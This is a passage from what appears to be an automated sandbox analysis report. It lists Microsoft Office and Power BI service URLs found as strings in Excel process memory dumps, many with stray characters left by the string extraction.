Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove5F
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove6
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryKV
Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://analysis.windows.net/powerbi/api.;
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechfe
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.aadrm.com
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.aadrm.com/Ru
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.office.com/addinstemplateg
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.office.com/app/query$j
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplateL
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.cortana.ai
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://api.cortana.aiBearer
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.diagnostics.office.com
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://api.diagnostics.office.comBearer
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.diagnostics.office.comom
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.microsoftstream.com/api/ntV
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.office.net$
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netg
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netm
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netn
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netr
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.powerbi.com/beta/myorg/imports?U
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets3h
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
